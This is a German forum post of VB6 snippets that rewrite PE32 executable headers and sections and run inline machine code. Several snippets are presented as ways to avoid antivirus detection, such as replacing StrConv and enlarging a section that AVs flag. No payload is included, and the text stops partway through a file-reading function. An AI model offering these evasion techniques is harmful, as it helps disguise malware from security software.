    [Source Code] VB6 Code snippets

    Hi Leute
    Hier ist ein kleines Snippet, mit dem man den DOS-Stub zwischen DOS-Header und PE-Header neutralisieren kann. Der Stub wird dabei nicht wirklich entfernt, sondern genullt und hinter die Section-Tabelle verschoben; e_lfanew zeigt danach auf Offset 0x40. Dateigröße und alle PointerToRawData bleiben unverändert, sodass die Sections weiterhin an ihren alten Offsets gefunden werden.

    Code:
    Option Explicit
    ' On-disk PE32 header layout mirrored as VB6 UDTs so that CopyMemory can
    ' overlay them on the raw file bytes.  Field order and field sizes ARE the
    ' memory layout: do not reorder or retype anything here.
    ' Sizes: DOS header 64, PE signature 4, IMAGE_FILE_HEADER 20, PE32
    ' IMAGE_OPTIONAL_HEADER 224 (=> IMAGE_NT_HEADERS 248), section header 40.
    ' IMAGE_EXPORT_DIRECTORY and IMAGE_IMPORT_DESCRIPTOR are not referenced by
    ' WipeDosStub; they are kept for completeness.
    Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&   ' "MZ" read as a little-endian WORD
    Private Const IMAGE_NT_SIGNATURE As Long = &H4550&    ' "PE\0\0" read as a little-endian DWORD
    Private Const SIZE_DOS_HEADER As Long = &H40
    Private Const SIZE_NT_HEADERS As Long = &HF8          ' 4 + 20 + 224: PE32 only, PE32+ has a larger optional header
    Private Type IMAGE_DOS_HEADER
    e_magic As Integer      ' must be IMAGE_DOS_SIGNATURE
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long        ' file offset of the PE signature; the DOS stub is the gap between 0x40 and this offset
    End Type
    Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer     ' number of 40-byte section headers following the optional header
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer ' 224 for a standard PE32; the section table starts right after it
    Characteristics As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer                ' &H10B = PE32; the layout below is only valid for that value
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long   ' sic (spec name: SizeOfUninitializedData); renaming would not change the layout
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
    Signature As Long               ' must be IMAGE_NT_SIGNATURE
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_EXPORT_DIRECTORY
    Characteristics As Long
    TimeDateStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    lpName As Long
    Base As Long
    NumberOfFunctions As Long
    NumberOfNames As Long
    lpAddressOfFunctions As Long
    lpAddressOfNames As Long
    lpAddressOfNameOrdinals As Long
    End Type
    Private Type IMAGE_SECTION_HEADER
    ' NOTE(review): VB6 presumably hands a DLL an ANSI copy of a UDT that
    ' contains a fixed-length String, so SecName occupies 8 bytes on the API
    ' side; that is what makes a 40-byte CopyMemory line up.  Verify before
    ' reusing this type with anything other than a Declare'd API.
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    Characteristics As Long
    End Type
    Private Type IMAGE_IMPORT_DESCRIPTOR
    Characteristics As Long
    OriginalFirstThunk As Long
    TimDateStamp As Long            ' sic (TimeDateStamp)
    ForwarderChain As Long
    Name1 As Long
    FirstThunk As Long
    End Type
    ' memcpy-equivalent; both pointer arguments are ByRef "As Any", so a UDT,
    ' an array element or "ByVal <address>" can be passed.
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)
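    Public Function WipeDosStub(sOldFile As String, sNewFile As String) As Boolean
        ' Neutralises the DOS stub of a PE32 file.  The bytes between the 64-byte
        ' IMAGE_DOS_HEADER and the PE signature are zeroed and moved behind the
        ' section table, and e_lfanew is pointed at offset 0x40.  The total
        ' header size, the file size and every PointerToRawData stay the same,
        ' so the sections are still found at their old offsets.
        '
        ' sOldFile : input PE file; never modified
        ' sNewFile : output path; replaced only when the input passed all checks
        ' Returns  : True on success.  False if the file is smaller than a DOS
        '            header, has a bad MZ/PE signature, has e_lfanew below 0x40
        '            or headers that run past the end of the file, or on any
        '            I/O error (the error is swallowed; no partial output is
        '            written because the whole image is built in memory first).
        Dim hIn As Integer, hOut As Integer
        Dim bIn() As Byte, bOut() As Byte
        Dim IDH As IMAGE_DOS_HEADER
        Dim INH As IMAGE_NT_HEADERS
        Dim cbFile As Long          ' total input size in bytes
        Dim lpNt As Long            ' original e_lfanew
        Dim cbStub As Long          ' bytes between the DOS header and the PE signature
        Dim cbNt As Long            ' PE signature + file header + optional header + section table
        Dim lpEOH As Long           ' offset of the first byte after the section table

        On Error GoTo Fail

        hIn = FreeFile
        Open sOldFile For Binary Access Read As #hIn
        cbFile = LOF(hIn)
        If cbFile < SIZE_DOS_HEADER Then Close #hIn: Exit Function
        ReDim bIn(0 To cbFile - 1)
        Get #hIn, , bIn
        Close #hIn
        hIn = 0

        ' Validate the DOS header BEFORE e_lfanew is used as an array index;
        ' the original read the NT headers first and only then checked "MZ".
        CopyMemory IDH, bIn(0), SIZE_DOS_HEADER
        If IDH.e_magic <> IMAGE_DOS_SIGNATURE Then Exit Function
        lpNt = IDH.e_lfanew
        If lpNt < SIZE_DOS_HEADER Then Exit Function
        If lpNt + SIZE_NT_HEADERS > cbFile Then Exit Function

        CopyMemory INH, bIn(lpNt), SIZE_NT_HEADERS
        If INH.Signature <> IMAGE_NT_SIGNATURE Then Exit Function

        ' Header size from the file header instead of the fixed PE32 constant,
        ' so a non-standard SizeOfOptionalHeader does not shift the section table.
        cbNt = 4 + 20 + INH.FileHeader.SizeOfOptionalHeader + INH.FileHeader.NumberOfSections * 40&
        lpEOH = lpNt + cbNt
        If lpEOH > cbFile Then Exit Function
        cbStub = lpNt - SIZE_DOS_HEADER

        ' Output layout, same total size as the input:
        '   [DOS header 64][NT headers + section table cbNt][zeros cbStub][bytes from lpEOH to EOF]
        ' ReDim zero-fills, so the relocated stub area needs no explicit clearing.
        ReDim bOut(0 To cbFile - 1)
        IDH.e_lfanew = SIZE_DOS_HEADER
        CopyMemory bOut(0), IDH, SIZE_DOS_HEADER
        CopyMemory bOut(SIZE_DOS_HEADER), bIn(lpNt), cbNt
        ' SIZE_DOS_HEADER + cbNt + cbStub = lpEOH, so the tail keeps its offsets.
        ' Copy exactly cbFile - lpEOH bytes: the original's Length() helper
        ' returns UBound - LBound and silently dropped the last byte of the file.
        If lpEOH < cbFile Then CopyMemory bOut(lpEOH), bIn(lpEOH), cbFile - lpEOH

        ' Open For Binary does not truncate; remove a stale, possibly longer
        ' output file first so no old bytes survive after the new image.
        If Len(Dir$(sNewFile)) > 0 Then Kill sNewFile
        hOut = FreeFile
        Open sNewFile For Binary Access Write As #hOut
        Put #hOut, , bOut
        Close #hOut
        hOut = 0
        WipeDosStub = True
        Exit Function
    Fail:
        If hIn <> 0 Then Close #hIn
        If hOut <> 0 Then Close #hOut
    End Function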
    Function Length(abArray() As Byte) As Long
        ' Distance between the upper and lower bound of abArray, i.e. ONE LESS
        ' than the element count of a populated zero-based array (a single
        ' element gives 0).  WipeDosStub uses exactly this value as a running
        ' write offset, so do not "fix" it to UBound - LBound + 1 without
        ' changing that caller too.
        ' Raises error 9 for an array that was never dimensioned, as UBound does.
        Dim nLow As Long
        Dim nHigh As Long
        nLow = LBound(abArray)
        nHigh = UBound(abArray)
        Length = nHigh - nLow
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Euch ist bestimmt aufgefallen, dass die VB6-Funktion StrConv manchmal detected wird. Hier ist eine kleine Alternative für die beiden Konvertierungen vbFromUnicode (String → Byte-Array) und vbUnicode (Byte-Array → String); andere Conversion-Werte werden nicht unterstützt.
    Code:
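    Public Function AltStrConv(Temp As Variant, Conversion As VbStrConv) As Variant
        ' Replacement for StrConv() covering the two conversions used here:
        '   vbFromUnicode : String -> Byte() with one byte per character (Asc(),
        '                   i.e. the system ANSI code page, like StrConv)
        '   vbUnicode     : Byte() -> String with one character per byte (Chr$())
        ' Any other Conversion value returns Empty, as before.
        '
        ' Temp : the String (vbFromUnicode) or Byte array (vbUnicode) to convert.
        '        An empty String yields an empty array and an empty array yields
        '        ""; the original raised error 9 on an empty String.
        Dim i As Long, n As Long
        Dim bArr() As Byte
        Dim sIn As String, sOut As String

        Select Case Conversion
        Case vbFromUnicode
            sIn = Temp
            n = Len(sIn)
            If n = 0 Then
                bArr = ""                   ' zero-length Byte array, no ReDim bArr(-1)
            Else
                ReDim bArr(0 To n - 1)
                For i = 1 To n
                    bArr(i - 1) = Asc(Mid$(sIn, i, 1))
                Next i
            End If
            AltStrConv = bArr
        Case vbUnicode
            bArr = Temp
            n = UBound(bArr) - LBound(bArr) + 1
            ' Fill a pre-sized buffer in place.  The original allocated
            ' Space$(n) and then APPENDED every character to it, so the result
            ' started with n blanks.
            sOut = Space$(n)
            For i = 1 To n
                Mid$(sOut, i, 1) = Chr$(bArr(LBound(bArr) + i - 1))
            Next i
            AltStrConv = sOut
        End Select
    End Function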
    ----------------------------------------------------------------------------------------------------------------
    Hier eine Funktion, die die Null-Bytes am Ende der letzten Section (das Padding bis zum FileAlignment, wo sonst EOF-Daten abgelegt werden) entfernt und SizeOfRawData dieser Section entsprechend verkleinert.
    Code:
    Option Explicit
    ' PE32 header layout as VB6 UDTs (memory layout: do not reorder fields).
    ' Sizes: DOS header 64, NT headers 248 (4 + 20 + 224), section header 40.
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&   ' "MZ"
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&   ' "PE\0\0"
    Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B&    ' OptionalHeader.Magic for PE32 (not checked by Delete_NOPS)
    Private Const SIZE_DOS_HEADER               As Long = &H40
    Private Const SIZE_NT_HEADERS               As Long = &HF8      ' PE32 only
    Private Const SIZE_SECTION_HEADER           As Long = &H28
    
    Public Type IMAGE_DOS_HEADER
    e_magic As Integer ' Magic number
    e_cblp As Integer ' Bytes on last page of file
    e_cp As Integer ' Pages in file
    e_crlc As Integer ' Relocations
    e_cparhdr As Integer ' Size of header in paragraphs
    e_minalloc As Integer ' Minimum extra paragraphs needed
    e_maxalloc As Integer ' Maximum extra paragraphs needed
    e_ss As Integer ' Initial (relative) SS value
    e_sp As Integer ' Initial SP value
    e_csum As Integer ' Checksum
    e_ip As Integer ' Initial IP value
    e_cs As Integer ' Initial (relative) CS value
    e_lfarlc As Integer ' File address of relocation table
    e_ovno As Integer ' Overlay number
    e_res(0 To 3) As Integer ' Reserved words
    e_oemid As Integer ' OEM identifier (for e_oeminfo)
    e_oeminfo As Integer ' OEM information; e_oemid specific
    e_res2(0 To 9) As Integer ' Reserved words
    e_lfanew As Long ' File address of new exe header
    End Type
    Public Type IMAGE_EXPORT_DIRECTORY   ' not used by Delete_NOPS
    Characteristics As Long
    TimeDateStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    Name As Long
    Base As Long
    NumberOfFunctions As Long
    NumberOfNames As Long
    AddressOfFunctions As Long
    AddressOfNames As Long
    AddressOfNameOrdinals As Long
    End Type
    Public Type IMAGE_IMPORT_DIRECTORY   ' = IMAGE_IMPORT_DESCRIPTOR; not used by Delete_NOPS
    dwRVAFunctionNameList As Long
    TimeDateStamp As Long
    ForwarderChain As Long
    dwRVAModuleName As Long
    dwRVAFunctionAddressList As Long
    End Type
    Public Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer      ' count of 40-byte section headers after the optional header
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer  ' 224 for a standard PE32
    Characteristics As Integer
    End Type
    Public Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    Public Type IMAGE_OPTIONAL_HEADER
    Magic As Integer                 ' &H10B = PE32; layout below is valid only for that
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long    ' sic (SizeOfUninitializedData)
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type
    Public Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type
    Public Type IMAGE_SECTION_HEADER
    ' NOTE(review): the fixed-length SecName is presumably passed to the API as
    ' 8 ANSI bytes (VB6 hands a DLL an ANSI copy of the UDT), which is what
    ' makes the 40-byte CopyMemory calls line up.  Verify before reusing this
    ' type outside of Declare'd calls.
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long          ' on-disk size of the section's data
    PointerToRawData As Long       ' file offset of the section's data
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    Characteristics As Long
    End Type
    'IMAGE DATA DIRECTORY (1-based list; DataDirectory index = entry - 1):
    '1-Export Table
    '2-Import Table
    '3-Resource Table
    '4-Exception Table
    '5-Certificate Table
    '6-Relocation Table
    '7-Debug Data
    '8-Architecture Data
    '9-Machine Value (MIPS GP)
    '10-TLS Table
    '11-Load Configuration Table
    '12-Bound Import Table
    '13-Import Address Table
    '14-Delay Import Descriptor
    '15-COM+ Runtime Header
    '16-Reserved
    ' Module-level scratch headers used by Delete_NOPS; they hold the headers
    ' of the file processed last, so the module is not reentrant.
    Dim IDH As IMAGE_DOS_HEADER
    Dim INH As IMAGE_NT_HEADERS
    Dim ISH As IMAGE_SECTION_HEADER
    ' memcpy-equivalent; both pointer arguments are ByRef "As Any".
    Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (dest As Any, Src As Any, ByVal L As Long)
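    Public Function Delete_NOPS(Data As String, Result As String)
        ' Strips the run of trailing zero bytes (alignment padding) from the
        ' LAST section of a PE32 file and shrinks that section's SizeOfRawData
        ' by the same amount.  Bytes after the section (an overlay) are kept
        ' and move forward by the number of bytes removed.
        '
        ' Data   : input file; never modified
        ' Result : output file; written only if Data passes the header checks
        '          (an existing Result is replaced).  No return value, as before.
        '
        ' Differences from the original: only CONTIGUOUS zeros at the end of the
        ' section are counted (the original counted every zero byte in the
        ' section and chopped that many bytes off the end of the file, which
        ' destroys data in sections with embedded zeros); the buffer is exactly
        ' LOF bytes (LOF(1) as the upper bound added a stray trailing byte);
        ' signatures and offsets are checked before they are used as indices.
        '
        ' NOTE(review): the PE spec says SizeOfRawData should be a multiple of
        ' FileAlignment.  The Windows loader is lenient in practice, but verify
        ' the result loads on the target OS.
        Dim bFile() As Byte, bResult() As Byte
        Dim h As Integer
        Dim cbFile As Long, cbNt As Long, lpSec As Long, lpEnd As Long, nTail As Long
        Dim i As Long

        h = FreeFile
        Open Data For Binary Access Read As #h
        cbFile = LOF(h)
        If cbFile < SIZE_DOS_HEADER Then Close #h: Exit Function
        ReDim bFile(0 To cbFile - 1)
        Get #h, , bFile
        Close #h

        Call CopyMemory(IDH, bFile(0), SIZE_DOS_HEADER)
        If IDH.e_magic <> IMAGE_DOS_SIGNATURE Then Exit Function
        If IDH.e_lfanew < SIZE_DOS_HEADER Or IDH.e_lfanew + SIZE_NT_HEADERS > cbFile Then Exit Function
        Call CopyMemory(INH, bFile(IDH.e_lfanew), SIZE_NT_HEADERS)
        If INH.Signature <> IMAGE_NT_SIGNATURE Then Exit Function
        If INH.FileHeader.NumberOfSections < 1 Then Exit Function

        ' Offset of the last section header, derived from SizeOfOptionalHeader
        ' rather than the fixed 248 so a non-standard optional header still works.
        cbNt = 4 + 20 + INH.FileHeader.SizeOfOptionalHeader
        lpSec = IDH.e_lfanew + cbNt + (INH.FileHeader.NumberOfSections - 1) * SIZE_SECTION_HEADER
        If lpSec + SIZE_SECTION_HEADER > cbFile Then Exit Function
        Call CopyMemory(ISH, bFile(lpSec), SIZE_SECTION_HEADER)

        lpEnd = ISH.PointerToRawData + ISH.SizeOfRawData      ' one past the section's last byte
        If ISH.PointerToRawData < 0 Or lpEnd < ISH.PointerToRawData Or lpEnd > cbFile Then Exit Function

        ' Count zeros from the end of the section backwards, stopping at the
        ' first non-zero byte.  A section with SizeOfRawData = 0 never enters
        ' the loop.
        nTail = 0
        For i = lpEnd - 1 To ISH.PointerToRawData Step -1
            If bFile(i) <> 0 Then Exit For
            nTail = nTail + 1
        Next i

        ISH.SizeOfRawData = ISH.SizeOfRawData - nTail
        ReDim bResult(0 To cbFile - nTail - 1)
        Call CopyMemory(bResult(0), bFile(0), lpEnd - nTail)
        If lpEnd < cbFile Then Call CopyMemory(bResult(lpEnd - nTail), bFile(lpEnd), cbFile - lpEnd)   ' overlay, shifted forward
        Call CopyMemory(bResult(lpSec), ISH, SIZE_SECTION_HEADER)

        ' Open For Binary does not truncate; drop a stale output file first so
        ' no old bytes survive past the new, shorter image.
        If Len(Dir$(Result)) > 0 Then Kill Result
        h = FreeFile
        Open Result For Binary Access Write As #h
        Put #h, , bResult
        Close #h
    End Function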
    ----------------------------------------------------------------------------------------------------------------
    Mit dieser Funktion könnt ihr die Größe (SizeOfRawData, VirtualSize) der letzten Section in der Section-Tabelle (bei VB6-Exen normalerweise .rsrc) um einen Wert vergrößern; SizeOfImage wird mitgezogen. Einige AVs melden Dateien, bei denen diese Größen nicht zu den tatsächlich vorhandenen Daten passen. Die Funktion ändert nur die Header – die zusätzlichen Bytes müsst ihr selbst an die Datei anhängen.
    Code:
    ' PE32 header layout as VB6 UDTs (memory layout: do not reorder fields).
    ' Sizes: DOS header 64, NT headers 248 (4 + 20 + 224), section header 40.
    ' This snippet has no Option Explicit; misspelled names are silently
    ' created as Variants.
    Private Const IMAGE_DOS_SIGNATURE           As Long = &H5A4D&   ' "MZ"
    Private Const IMAGE_NT_SIGNATURE            As Long = &H4550&   ' "PE\0\0"
    Private Type IMAGE_DOS_HEADER
        e_magic                     As Integer
        e_cblp                      As Integer
        e_cp                        As Integer
        e_crlc                      As Integer
        e_cparhdr                   As Integer
        e_minalloc                  As Integer
        e_maxalloc                  As Integer
        e_ss                        As Integer
        e_sp                        As Integer
        e_csum                      As Integer
        e_ip                        As Integer
        e_cs                        As Integer
        e_lfarlc                    As Integer
        e_ovno                      As Integer
        e_res(0 To 3)               As Integer
        e_oemid                     As Integer
        e_oeminfo                   As Integer
        e_res2(0 To 9)              As Integer
        e_lfanew                    As Long     ' file offset of the PE signature
    End Type
    Private Type IMAGE_FILE_HEADER
        Machine                     As Integer
        NumberOfSections            As Integer  ' number of 40-byte section headers
        TimeDateStamp               As Long
        PointerToSymbolTable        As Long
        NumberOfSymbols             As Long
        SizeOfOptionalHeader        As Integer  ' 224 for a standard PE32
        characteristics             As Integer
    End Type
    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress              As Long
        Size                        As Long
    End Type
    Private Type IMAGE_OPTIONAL_HEADER
        Magic                       As Integer  ' &H10B = PE32; layout below is valid only for that
        MajorLinkerVersion          As Byte
        MinorLinkerVersion          As Byte
        SizeOfCode                  As Long
        SizeOfInitializedData       As Long
        SizeOfUnitializedData       As Long     ' sic (SizeOfUninitializedData)
        AddressOfEntryPoint         As Long
        BaseOfCode                  As Long
        BaseOfData                  As Long
        ImageBase                   As Long
        SectionAlignment            As Long     ' in-memory alignment; SizeOfImage is a multiple of it
        FileAlignment               As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion           As Integer
        MinorImageVersion           As Integer
        MajorSubsystemVersion       As Integer
        MinorSubsystemVersion       As Integer
        W32VersionValue             As Long
        SizeOfImage                 As Long     ' virtual size of the mapped image
        SizeOfHeaders               As Long
        CheckSum                    As Long
        SubSystem                   As Integer
        DllCharacteristics          As Integer
        SizeOfStackReserve          As Long
        SizeOfStackCommit           As Long
        SizeOfHeapReserve           As Long
        SizeOfHeapCommit            As Long
        LoaderFlags                 As Long
        NumberOfRvaAndSizes         As Long
        DataDirectory(0 To 15)      As IMAGE_DATA_DIRECTORY
    End Type
    Private Type IMAGE_NT_HEADERS
        Signature                   As Long
        FileHeader                  As IMAGE_FILE_HEADER
        OptionalHeader              As IMAGE_OPTIONAL_HEADER
    End Type
    Private Type IMAGE_SECTION_HEADER
        ' NOTE(review): SecName presumably reaches the API as 8 ANSI bytes
        ' (VB6 passes an ANSI copy of UDTs to DLLs), which is what makes the
        ' 40-byte CopyMemory calls line up.  Verify before reusing elsewhere.
        SecName                     As String * 8
        VirtualSize                 As Long
        VirtualAddress              As Long
        SizeOfRawData               As Long
        PointerToRawData            As Long
        PointerToRelocations        As Long
        PointerToLinenumbers        As Long
        NumberOfRelocations         As Integer
        NumberOfLinenumbers         As Integer
        characteristics             As Long
    End Type
    ' memcpy-equivalent; both pointer arguments are ByRef "As Any".
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long)
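    Function EnlargeSection(szFilePath As String, Length As String) As Boolean
        ' Grows the LAST section header of a PE32 file in place: SizeOfRawData
        ' and VirtualSize are increased by Length bytes and SizeOfImage is
        ' recomputed as the end of that section rounded up to SectionAlignment.
        ' Only the headers are rewritten; appending the actual Length bytes of
        ' data to the file is the caller's job.
        '
        ' szFilePath : PE file, modified in place
        ' Length     : number of bytes to add, as a numeric string (kept as a
        '              String for existing callers; CLng raises error 13 on a
        '              non-numeric value, which the caller sees as a False return)
        ' Returns    : True if the headers were rewritten; False if the file is
        '              not a PE32 image this function handles or on I/O error.
        '
        ' Fixes relative to the original: the buffer is exactly LOF bytes (the
        ' original's ReDim bFile(LOF(1)) grew the file by one byte per call);
        ' SizeOfImage is aligned to SectionAlignment as the PE spec requires;
        ' offsets are validated before use; the result is actually returned.
        Dim bFile() As Byte
        Dim IDH As IMAGE_DOS_HEADER, INH As IMAGE_NT_HEADERS, ISH As IMAGE_SECTION_HEADER
        Dim h As Integer
        Dim cbFile As Long, cbNt As Long, lpSec As Long, lAdd As Long, lEnd As Long, lAlign As Long

        On Error GoTo Fail
        lAdd = CLng(Length)

        h = FreeFile
        Open szFilePath For Binary Access Read As #h
        cbFile = LOF(h)
        If cbFile < 64 Then Close #h: Exit Function
        ReDim bFile(0 To cbFile - 1)
        Get #h, , bFile
        Close #h

        Call CopyMemory(IDH, bFile(0), 64)
        If IDH.e_magic <> IMAGE_DOS_SIGNATURE Then Exit Function
        If IDH.e_lfanew < 64 Or IDH.e_lfanew + 248 > cbFile Then Exit Function
        Call CopyMemory(INH, bFile(IDH.e_lfanew), 248)
        If INH.Signature <> IMAGE_NT_SIGNATURE Then Exit Function
        If INH.OptionalHeader.Magic <> &H10B Then Exit Function      ' PE32 only; PE32+ has a different optional-header layout
        If INH.FileHeader.NumberOfSections < 1 Then Exit Function

        ' Last section header; 24 = PE signature + IMAGE_FILE_HEADER.
        cbNt = 24 + INH.FileHeader.SizeOfOptionalHeader
        lpSec = IDH.e_lfanew + cbNt + (INH.FileHeader.NumberOfSections - 1) * 40&
        If lpSec + 40 > cbFile Then Exit Function
        Call CopyMemory(ISH, bFile(lpSec), 40)

        ISH.SizeOfRawData = ISH.SizeOfRawData + lAdd
        ISH.VirtualSize = ISH.VirtualSize + lAdd

        ' SizeOfImage = end of the last section, rounded up to SectionAlignment.
        lEnd = ISH.VirtualAddress + ISH.VirtualSize
        lAlign = INH.OptionalHeader.SectionAlignment
        If lAlign > 0 Then
            If (lEnd Mod lAlign) <> 0 Then lEnd = lEnd + (lAlign - (lEnd Mod lAlign))
        End If
        INH.OptionalHeader.SizeOfImage = lEnd

        Call CopyMemory(bFile(IDH.e_lfanew), INH, 248)
        Call CopyMemory(bFile(lpSec), ISH, 40)

        ' Same size as what was read, so Open For Binary (no truncation) is safe here.
        h = FreeFile
        Open szFilePath For Binary Access Write As #h
        Put #h, , bFile
        Close #h
        EnlargeSection = True
        Exit Function
    Fail:
        If h > 0 Then Close #h
    End Function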
    ----------------------------------------------------------------------------------------------------------------
    Diese Funktion gibt den vollständigen Pfad der eigenen EXE zurück. Sie liest dazu per Inline-Maschinencode ImagePathName aus den Prozessparametern im PEB (nur 32-Bit); der Code wird aus einem Byte-Array heraus ausgeführt, was bei aktiviertem DEP fehlschlägt. Ohne Maschinencode geht das mit App.Path & "\" & App.EXEName & ".exe" oder GetModuleFileName.
    Code:
    ' Used purely as a "call this address" primitive: lpPrevWndFunc is the
    ' address of the machine code, hwnd carries the single argument.  This is a
    ' public module-level Declare (no Private), so it is visible project-wide.
    Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, Optional ByVal hwnd As Long, Optional ByVal Msg As Long, Optional ByVal wParam As Long, Optional ByVal lParam As Long) As Long
    Public Function GetFileName() As String
        ' Returns the full path of the running executable by copying
        ' ProcessParameters.ImagePathName out of the PEB with a small piece of
        ' x86 machine code.  The result is a 260-WCHAR BSTR whose length prefix
        ' the code patches to the real length.
        '
        ' Limits (nothing below checks them): 32-bit only (PEB/FS layout);
        ' the buffer is MAX_PATH WCHARs and a longer ImagePathName overruns it;
        ' the code runs from a Byte array (data memory), which DEP blocks.
        ' mAsmByte and i are never declared (this snippet has no Option Explicit).
        Dim mOpCode        As String
        Dim bvName(519)    As Byte      ' 260 WCHARs of NUL
        
        GetFileName = bvName            ' Byte array -> String: allocates the 520-byte BSTR the code writes into
        
        ' Hex of the machine code, decoded:
        '   64 A1 30 00 00 00   mov   eax, fs:[30h]          ; PEB
        '   8B 40 10            mov   eax, [eax+10h]         ; PEB.ProcessParameters
        '   8B 70 3C            mov   esi, [eax+3Ch]         ; ImagePathName.Buffer
        '   0F B7 48 38         movzx ecx, word [eax+38h]    ; ImagePathName.Length (bytes)
        '   8B 7C 24 04         mov   edi, [esp+4]           ; first argument = StrPtr(GetFileName)
        '   51                  push  ecx
        '   FC                  cld
        '   F3 A4               rep movsb                    ; copy Length bytes of the path
        '   59                  pop   ecx
        '   8B 74 24 04         mov   esi, [esp+4]
        '   89 4E FC            mov   [esi-4], ecx           ; patch the BSTR byte-length prefix
        '   C3                  ret
        mOpCode = "64A1300000008B40108B703C0FB748388" & _
                  "B7C240451FCF3A4598B742404894EFCC3"
        
        ' Two hex digits per byte.
        ReDim mAsmByte(0 To Len(mOpCode) / 2 - 1) As Byte
        For i = 0 To Len(mOpCode) - 1 Step 2
        mAsmByte((i / 2)) = CByte("&h" & Mid$(mOpCode, i + 1, 2))
        Next
        
       ' Jump into the byte array; the BSTR pointer travels in the hwnd slot.
       CallWindowProc VarPtr(mAsmByte(0)), StrPtr(GetFileName)
    End Function
    ----------------------------------------------------------------------------------------------------------------
    Hier ist eine kleine Funktion, die ich geschrieben habe und die vollständig Unicode-kompatibel ist (der Dateiname wird über CreateFileW übergeben, nicht über das Open-Statement). Sie ersetzt z. B.:
    Code:
    ' The classic VB6 way of slurping a file into a String: Get fills Len(Size)
    ' ANSI bytes.  Open takes the path as a VB String that is converted to ANSI
    ' on the way to the OS, which is what getFileString below avoids.
    Dim Size As String
    Open App.Path & "\DeineDatei.exe" For Binary As #1
    Size = Space(LOF(1))
    Get #1, , Size
    Close #1
    Funktion:
    Code:
    Option Explicit
    ' Win32 OVERLAPPED.  The first two fields are named Internal/InternalHigh
    ' in the SDK; the names here are truncated but the 20-byte layout is right.
    Private Type OVERLAPPED
        ternal As Long
        ternalHigh As Long
        offset As Long
        OffsetHigh As Long
        hEvent As Long
    End Type
    ' Wide-char CreateFile: lpFileName is passed as StrPtr() of a VB String,
    ' which is already UTF-16.
    Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileW" ( _
    ByVal lpFileName As Long, _
    ByVal dwDesiredAccess&, _
